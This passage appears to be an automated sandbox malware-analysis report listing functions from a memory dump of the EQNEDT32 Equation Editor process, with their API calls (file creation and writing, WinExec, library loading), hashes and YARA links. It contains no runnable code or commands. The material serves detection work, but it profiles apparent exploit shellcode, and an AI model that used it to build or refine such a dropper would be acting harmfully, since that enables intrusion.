Instruction ID: 419962e4bb8e223af516e4c3f965aaa96ba9cebd4122bd2c903d20dab7064c72
Opcode Fuzzy Hash: d34d02f4a8ccd5734fb77dc4fe02df7d8690f4fc7bcc259526d2b40a5bd39fd5
Instruction Fuzzy Hash: 2B21A9714083416FD711EAA0DD41F6FBBBAFBC2B50F14894DF1914B0F2E6B2D5099692

Uniqueness

Uniqueness Score: -1.00%

Function 035003B7 Relevance: 3.1, APIs: 2, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNELBASE(035003A5), ref: 035003B7

Part of subcall function 035003D0: CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 0350047C

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: CreateExitFileProcess
String ID:
API String ID: 2838702978-0
Opcode ID: 6414d41aded95c3167a019247c819fa869701a2fe4505c8274b025708f2f607e
Instruction ID: 5d9eaeaebf38246f1cadae31c8ee10df89e05787028b1f5c6da671a5f18a6655
Opcode Fuzzy Hash: 6414d41aded95c3167a019247c819fa869701a2fe4505c8274b025708f2f607e
Instruction Fuzzy Hash: 5121F16580D7C01FD321D7702E9A7A4BF60BB53900F1D8ADE81C54F1F3E2A7924A935A

Uniqueness

Uniqueness Score: -1.00%

Function 0350069C Relevance: 3.0, APIs: 2, Instructions: 46
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WinExec.KERNEL32(?,00000001,?,03500694,?,03500657,?,?,0350063E,00000000,00000000,00000000,00000000,035004DC,00000050,00000000), ref: 035006A9

Part of subcall function 035006BC: ExitProcess.KERNELBASE(00000000,?,035006B0,?,03500694,?,03500657,?,?,0350063E,00000000,00000000,00000000,00000000,035004DC,00000050), ref: 035006C1

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: ExecExitProcess
String ID:
API String ID: 4112423671-0
Opcode ID: 09d7e942a8b6d033ba72d1ddd3f717c78c986e7522e5b90d67ec5e1a4840f4c2
Instruction ID: f863ca485839f236006cab30ff7dbc6ec09b823262cb18019c105310fe7fae7a
Opcode Fuzzy Hash: 09d7e942a8b6d033ba72d1ddd3f717c78c986e7522e5b90d67ec5e1a4840f4c2
Instruction Fuzzy Hash: 7EF0F4A990434261CB30F22868557FBAB91BB81350FCC8847D882070F5E56F81C38E5A

Uniqueness

Uniqueness Score: -1.00%

Function 0350044C Relevance: 1.6, APIs: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4dffbc39676873fdc514b4a93b0b437944a69b5352fc09b0b4d07c6674c981cd
Instruction ID: 6766ea85875603fe3717f8023f16a0c32b9ba414879eeb35bd82dd826fc2d1af
Opcode Fuzzy Hash: 4dffbc39676873fdc514b4a93b0b437944a69b5352fc09b0b4d07c6674c981cd
Instruction Fuzzy Hash: B341AB6044D3C12EDB22E7B4AD66B6ABF747F83600F1985CEE2814F1F3E6965205C31A

Uniqueness

Uniqueness Score: -1.00%

Function 035004F6 Relevance: 1.6, APIs: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 664742f590045bbcf0d15909ae765ea9a2740273dbd5d7486921ae46d5827649
Instruction ID: 015d08f123aa02693699928542e6845b854b00882184b74dfb591fc7bb0b0775
Opcode Fuzzy Hash: 664742f590045bbcf0d15909ae765ea9a2740273dbd5d7486921ae46d5827649
Instruction Fuzzy Hash: 3331C76044C3C22FD712DBA4DD51B6BBF79BFC2600F18898EF1814B0F2E6669618C766

Uniqueness

Uniqueness Score: -1.00%

Function 03500224 Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: CreateExitFileProcess
String ID:
API String ID: 2838702978-0
Opcode ID: dfef57e11d2bddf6dabb232f9357d3650d6a3ed9f6d4ec21481c072131263883
Instruction ID: 09405a660972302693537b34ae13c229fe1ffdd9068c4097385c82d0631a8577
Opcode Fuzzy Hash: dfef57e11d2bddf6dabb232f9357d3650d6a3ed9f6d4ec21481c072131263883
Instruction Fuzzy Hash: B441EF6140D3C19FE716D630AE9A7A4BF60BB13600F1C4ADBC4C64F1F3E266924A935B

Uniqueness

Uniqueness Score: -1.00%

Function 035002A4 Relevance: 1.6, APIs: 1, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: CreateExitFileProcess
String ID:
API String ID: 2838702978-0
Opcode ID: 5ebe6dbe8446fcf77d266a32399f0b43572dd073ed1ea87871433eda64c3c390
Instruction ID: ef3f7e9bce261aef6315b82c2e3975fdf35132cb24e154857e57ea8d26b61a7d
Opcode Fuzzy Hash: 5ebe6dbe8446fcf77d266a32399f0b43572dd073ed1ea87871433eda64c3c390
Instruction Fuzzy Hash: 3041FF6140D3C09FD716D720AE5A7A5BF60BB12600F1C4ADBC4CA4F1F3E267924A935A

Uniqueness

Uniqueness Score: -1.00%

Function 035002DF Relevance: 1.6, APIs: 1, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: CreateExitFileProcess
String ID:
API String ID: 2838702978-0
Opcode ID: bc056b37b8d5430754652d067cfdafb9532548946dcc738dfdbd35fd5d06733e
Instruction ID: a798a3d805cc2d42b4f3441fac9b96f09d4445b7bd75b48b1973b5723af15959
Opcode Fuzzy Hash: bc056b37b8d5430754652d067cfdafb9532548946dcc738dfdbd35fd5d06733e
Instruction Fuzzy Hash: 2341F26140D7C18FD716D670AE5A7A4BF607B12500F0C4A9BC4C64F0F3D2A7524A935B

Uniqueness

Uniqueness Score: -1.00%

Function 035002F5 Relevance: 1.6, APIs: 1, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: CreateExitFileProcess
String ID:
API String ID: 2838702978-0
Opcode ID: 67c296a0f0c452991ff466505c069b148f2200ff914e37d85d94933a84017cb2
Instruction ID: 3d3f27ad21cbe9d8aeac08ceedf0ff0f0c8eed98a959b800028575aaad61f8bf
Opcode Fuzzy Hash: 67c296a0f0c452991ff466505c069b148f2200ff914e37d85d94933a84017cb2
Instruction Fuzzy Hash: 9631106140D3C05FD712D720AE9A7A5BF60BB13600F1D8ADBC5C94F1F3E2A7524A936A

Uniqueness

Uniqueness Score: -1.00%

Function 0350031F Relevance: 1.6, APIs: 1, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: CreateExitFileProcess
String ID:
API String ID: 2838702978-0
Opcode ID: c2719f5805c7fc00575cc19c4675a2703bd0b635e5d38dcdfb319bb3d945f4c1
Instruction ID: 52adc37cb644a9868b5b7fd257436b3ad297a756c3cb51f0e741d88a504a4ea7
Opcode Fuzzy Hash: c2719f5805c7fc00575cc19c4675a2703bd0b635e5d38dcdfb319bb3d945f4c1
Instruction Fuzzy Hash: B731F26180D7C15FD712D670AE5A7A4BF60BB13600F0C8ADBC1C54F5F3E26A9246935B

Uniqueness

Uniqueness Score: -1.00%

Function 03500254 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: CreateExitFileProcess
String ID:
API String ID: 2838702978-0
Opcode ID: 543785cbb62a5d49cdbbe7b18975cb33ced1f716282e23c36375f809c686baf6
Instruction ID: c6dcc0047ae156798a9baf7a57d71fb600b1f998160c9ed8d2eea54da9dd3f6a
Opcode Fuzzy Hash: 543785cbb62a5d49cdbbe7b18975cb33ced1f716282e23c36375f809c686baf6
Instruction Fuzzy Hash: 8631DD6180D3C19FD716D6706E6A7A4BF607B12500B0D8ADBC4C64F1F3E2A7924A935B

Uniqueness

Uniqueness Score: -1.00%

Function 03500249 Relevance: 1.6, APIs: 1, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: CreateExitFileProcess
String ID:
API String ID: 2838702978-0
Opcode ID: b502d464c79e48f11739a65e7da5e3c60fe015f4616ed4c2ff152b7e3ce17e7c
Instruction ID: 5840ea24fb386d59ea6c55d74f7a7e9c72dd42f05498abddac7a181b71ffee31
Opcode Fuzzy Hash: b502d464c79e48f11739a65e7da5e3c60fe015f4616ed4c2ff152b7e3ce17e7c
Instruction Fuzzy Hash: 7E31CE6140D7C19FD716D630AE6A7A4BF60BB12500B0C8A9BC4C64F1F3E2A7924A935B

Uniqueness

Uniqueness Score: -1.00%

Function 035002EB Relevance: 1.6, APIs: 1, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: CreateExitFileProcess
String ID:
API String ID: 2838702978-0
Opcode ID: d488263ba51873f234b2d27a52a4654db955e3cefa6851767f5ab00487be5ae1
Instruction ID: 1e5c9c174599fb3e0ce7f568f208af16dce7b99c47b287b16b619c1b6ef5e20a
Opcode Fuzzy Hash: d488263ba51873f234b2d27a52a4654db955e3cefa6851767f5ab00487be5ae1
Instruction Fuzzy Hash: CD31CC6180D7C19FD716D630AE6A7A4BF607B12500B0C8A9B84C64F1F3E2A7924A935B

Uniqueness

Uniqueness Score: -1.00%

Function 03500496 Relevance: 1.6, APIs: 1, Instructions: 114libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(03500486), ref: 03500496

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7d611646573f973f29cd3d571ff4b855686d7c636389b3da5a965bb4516b47b8
Instruction ID: a9e022d8b043e4f2dacad34ba93c719f4282ccc3a4d85a07611995ad94d4418a
Opcode Fuzzy Hash: 7d611646573f973f29cd3d571ff4b855686d7c636389b3da5a965bb4516b47b8
Instruction Fuzzy Hash: C531AB6044D7C12ED722E7B4AD6AB6ABF74BF83600F1885CEE1814F1F3E6965205D326

Uniqueness

Uniqueness Score: -1.00%

Function 0350031A Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: CreateExitFileProcess
String ID:
API String ID: 2838702978-0
Opcode ID: fbbb9a6aa8e1115c8715456c65587e538df273578a5e5e8de951d4dbb5afee95
Instruction ID: 9e45dd8084ccc71f76ccbe8e682f25cc0ae282efa208a7428d2fb5134b74348a
Opcode Fuzzy Hash: fbbb9a6aa8e1115c8715456c65587e538df273578a5e5e8de951d4dbb5afee95
Instruction Fuzzy Hash: 6231CC6180D7C19FD716D630AE6A7A4BF607B12500B0C8A9B84C64F1F3E2A7924A935B

Uniqueness

Uniqueness Score: -1.00%

Function 0350028F Relevance: 1.6, APIs: 1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: CreateExitFileProcess
String ID:
API String ID: 2838702978-0
Opcode ID: 82cdf1e5fea91c7d4566ed2e81d9480f45649552ea509d1e7972ac48aeff823a
Instruction ID: 0c6900d50d162e0fd3bdf02eb5013493e5c2883f4fcdefd4ae38009e7e1ea289
Opcode Fuzzy Hash: 82cdf1e5fea91c7d4566ed2e81d9480f45649552ea509d1e7972ac48aeff823a
Instruction Fuzzy Hash: 9B31BD6180D7C19FD716D620AE5A7A4BF607B13500F0D8ADB84C64F1F3E2A7924A935B

Uniqueness

Uniqueness Score: -1.00%

Function 03500279 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: CreateExitFileProcess
String ID:
API String ID: 2838702978-0
Opcode ID: c3eb98bdf25d8c78ada52c0911afe100e6dab38bdb237c7034416552be4e9306
Instruction ID: 05bbd2bf78af7039cf8b22a67d967269fb1e93648e335c3dd1eff2cd0fe034d3
Opcode Fuzzy Hash: c3eb98bdf25d8c78ada52c0911afe100e6dab38bdb237c7034416552be4e9306
Instruction Fuzzy Hash: 1531CA6180D3C15FD712D660AE5A7A4BF60BB12500F0D8ADBC4C64F1F3E2A6924A936A

Uniqueness

Uniqueness Score: -1.00%

Function 03500244 Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: CreateExitFileProcess
String ID:
API String ID: 2838702978-0
Opcode ID: 4046427d3c48354f5e30962364d2386149e26f0a40cd5cb1117a9c35a6147eab
Instruction ID: f0e3ecda42822484bfb172632a3301a260e2775152b2a426ccabfd25980b80fb
Opcode Fuzzy Hash: 4046427d3c48354f5e30962364d2386149e26f0a40cd5cb1117a9c35a6147eab
Instruction Fuzzy Hash: 6E31AB6180D7C05FD712D6606E9A7A4BF60BB13500F0D8ADBC5C54F1F3E2A6924A936B

Uniqueness

Uniqueness Score: -1.00%

Function 0350024B Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: CreateExitFileProcess
String ID:
API String ID: 2838702978-0
Opcode ID: 394e3be1db9414d480c3c3acd90b535f9c4f877ab97d44f231d2398ca75b1b18
Instruction ID: f0e3ecda42822484bfb172632a3301a260e2775152b2a426ccabfd25980b80fb
Opcode Fuzzy Hash: 394e3be1db9414d480c3c3acd90b535f9c4f877ab97d44f231d2398ca75b1b18
Instruction Fuzzy Hash: 6E31AB6180D7C05FD712D6606E9A7A4BF60BB13500F0D8ADBC5C54F1F3E2A6924A936B

Uniqueness

Uniqueness Score: -1.00%

Function 035002CB Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: CreateExitFileProcess
String ID:
API String ID: 2838702978-0
Opcode ID: 5b3aac8f888d5116862156d71f5f9caa17f600627bee825ba8d06189eb94f01a
Instruction ID: 1f59aabcfd0e62035981e7c23336a97052811792d36ff1a3456bbc24d9a1d352
Opcode Fuzzy Hash: 5b3aac8f888d5116862156d71f5f9caa17f600627bee825ba8d06189eb94f01a
Instruction Fuzzy Hash: DE31AB6180D7C05FD712D6606E9A7A4BF60BB13500F0D8ADBC5C54F1F3E2A6924A936B

Uniqueness

Uniqueness Score: -1.00%

Function 035002CE Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: CreateExitFileProcess
String ID:
API String ID: 2838702978-0
Opcode ID: cd2170bbd205a0100983fa0dac93cefa040e1fe52a958de0140f1e1b6cdf1d7a
Instruction ID: 1b7c64b0003ef79d54f312b498ec360c43ba9309f7ac7fdc062bbbb5e353193b
Opcode Fuzzy Hash: cd2170bbd205a0100983fa0dac93cefa040e1fe52a958de0140f1e1b6cdf1d7a
Instruction Fuzzy Hash: D731BA6140D7C01FD722D7706EAA7A4BF60BB13500F0D86CB85C54F1F3E2A6924A936A

Uniqueness

Uniqueness Score: -1.00%

Function 0350026D Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: CreateExitFileProcess
String ID:
API String ID: 2838702978-0
Opcode ID: fdbe4d8aa01f499e842a974e057939047fcc348efd223732417a8103b230cdd8
Instruction ID: c12df2f5ff598776f9ce0f526dd880eb7cc9450e6d627ef2000c7867b9459ede
Opcode Fuzzy Hash: fdbe4d8aa01f499e842a974e057939047fcc348efd223732417a8103b230cdd8
Instruction Fuzzy Hash: 4C31AB6180D7C05FD712D6606E9A7A4BF60BB13500F0D8ADBC5C54F1F3E2A6924A936B

Uniqueness

Uniqueness Score: -1.00%

Function 03500289 Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: CreateExitFileProcess
String ID:
API String ID: 2838702978-0
Opcode ID: 043d1d805c8cfce0d42c5ea88bbb34bef2c8a1233ee0f43f0282cc9beaa4d654
Instruction ID: 7c99c1e1fefc90c7193b27acb797d7fcb3de5b950230a7660e29b3dca15df7e7
Opcode Fuzzy Hash: 043d1d805c8cfce0d42c5ea88bbb34bef2c8a1233ee0f43f0282cc9beaa4d654
Instruction Fuzzy Hash: 5331DE6180D7C05FD712D7706E5A7A4BF60BB13500F0D8ADBC5C54F1F3E2A6A24A936A

Uniqueness

Uniqueness Score: -1.00%

Function 0350034C Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: CreateExitFileProcess
String ID:
API String ID: 2838702978-0
Opcode ID: a0fe542320fc140bb1c1915ba26eb4654991678b1457a94a6da4369e1856c7c9
Instruction ID: ea46d85c259854db12df81ba775c4d1b81da1c9e345a6f49358e86281622205c
Opcode Fuzzy Hash: a0fe542320fc140bb1c1915ba26eb4654991678b1457a94a6da4369e1856c7c9
Instruction Fuzzy Hash: C431CB6180D7C05FD712D7706E9A7A4BF60BB13500F0D8ADBC5C54F1F3E2A6A24A936A

Uniqueness

Uniqueness Score: -1.00%

Function 0350033F Relevance: 1.6, APIs: 1, Instructions: 99fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 0350047C

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5bc56cd7e8ca869814bb5e96c7447b5888daa544d17e62665bf2a9042e4a3518
Instruction ID: 1e09c7f1bfb41748c550bae2249c5416bcd624f60688c281b06e070921f24a96
Opcode Fuzzy Hash: 5bc56cd7e8ca869814bb5e96c7447b5888daa544d17e62665bf2a9042e4a3518
Instruction Fuzzy Hash: 5631DA6180D3C05FD712D7606E9A7A4BF60BB13A00F1D86CBC1C54F0F3E2A6924A936A

Uniqueness

Uniqueness Score: -1.00%

Function 03500391 Relevance: 1.6, APIs: 1, Instructions: 98fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 0350047C

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3da7f3a7ba8021afd66381b02291edbbc798abc62c6d3f295ce1b88344e7fcbf
Instruction ID: 1fe45c2f3e3aafee490d40dd351bcf16f66e12d32b6dea93725426890d9ff9c8
Opcode Fuzzy Hash: 3da7f3a7ba8021afd66381b02291edbbc798abc62c6d3f295ce1b88344e7fcbf
Instruction Fuzzy Hash: 0A31DA6180D3C05FD712D7606E5A7A4BF60BF13A00F1D86CBC1C54F0F3E2A6924A936A

Uniqueness

Uniqueness Score: -1.00%

Function 03500542 Relevance: 1.6, APIs: 1, Instructions: 84fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(03500523,0350053A,00000000,00000000,00000000,?,0350053A,03500523,00000000,00000000,00000000,00000000,035004DC,00000050,00000000), ref: 03500632

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d4d463e9b9c9ed4a6d9070107b554e4f8b46087707d5ad8be43035a7d0fae483
Instruction ID: eb199e724a190ef480d18b6166f87b6a8cf7948356008b11cbb90e9cf6c7ecd1
Opcode Fuzzy Hash: d4d463e9b9c9ed4a6d9070107b554e4f8b46087707d5ad8be43035a7d0fae483
Instruction Fuzzy Hash: 4C2180B04083867FD711EB94DD42B6FBABAFBC1A00F14894DB1914B0F1E672960886A5

Uniqueness

Uniqueness Score: -1.00%

Function 035003D0 Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e8cdf42cac368371fbd2f8a10de28b9d021d251779e62dfb49a7f97990187218
Instruction ID: e142d72068bc14916b872ec600f328c42136702eff1351da71d7d38d7af7d3b0
Opcode Fuzzy Hash: e8cdf42cac368371fbd2f8a10de28b9d021d251779e62dfb49a7f97990187218
Instruction Fuzzy Hash: 9D21036540D3C01FD321D7702E9A7A9BE607F92500F1D86CE81C54F1F3E2AB910A931E

Uniqueness

Uniqueness Score: -1.00%

Function 035003EC Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: dcf0b0c4c4cb304281e93999da3cc2d2c974dc5c0ff9a8768084b643f31265cf
Instruction ID: ccfec9ec47e85d2b98f3fc27416c3ad1ab3487f0c11164c3e4aade9de99dda85
Opcode Fuzzy Hash: dcf0b0c4c4cb304281e93999da3cc2d2c974dc5c0ff9a8768084b643f31265cf
Instruction Fuzzy Hash: 0F1126A544C3C11FE321D7702E9A7A5BF60BB52500F0DC68E91C54F1F3E2A69106935B

Uniqueness

Uniqueness Score: -1.00%

Function 035005CF Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: de31582968c94efa9818b26229c2e82a7a8d94e9a828fc457e667c7dec0a266d
Instruction ID: cb20da02bc6f28de7507a500fa7e00f8514ac4d1ea540b262f1237e7373ccef3
Opcode Fuzzy Hash: de31582968c94efa9818b26229c2e82a7a8d94e9a828fc457e667c7dec0a266d
Instruction Fuzzy Hash: F41184714083826FD711EA50DC45F6FBBBAFFC1B50F148A4DB1914B0E1E7B2D50886A2

Uniqueness

Uniqueness Score: -1.00%

Function 0350055E Relevance: 1.6, APIs: 1, Instructions: 64fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(03500523,0350053A,00000000,00000000,00000000,?,0350053A,03500523,00000000,00000000,00000000,00000000,035004DC,00000050,00000000), ref: 03500632

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 19abb07f664a7bfaba3f6f8eb50ada1189bdad441aab37431a0cbd58e181a6b3
Instruction ID: 701c8b9a13d815a9ef59800ef870f495c1fa73dc20a4ace47711d7ec5af402a7
Opcode Fuzzy Hash: 19abb07f664a7bfaba3f6f8eb50ada1189bdad441aab37431a0cbd58e181a6b3
Instruction Fuzzy Hash: 55115E700083467FD712EA94DD42F6FBBBAFBC4B00F048D18B191460F1E77296088AA6

Uniqueness

Uniqueness Score: -1.00%

Function 03500413 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 581e4607c75e21bd5b588b68bef4f5ea4c1a47839374d9aee5ee39d27777e0c5
Instruction ID: 0bea3b7878954fe10f5390b319aa35e6398c1eb1cdd9c9a2b6b1d4d871e0549f
Opcode Fuzzy Hash: 581e4607c75e21bd5b588b68bef4f5ea4c1a47839374d9aee5ee39d27777e0c5
Instruction Fuzzy Hash: 06019EA540D3C02FE762D7702D5AB95BF647B52604F0DCA8EA5C84F1E3E2A6910A835A

Uniqueness

Uniqueness Score: -1.00%

Function 0350058F Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

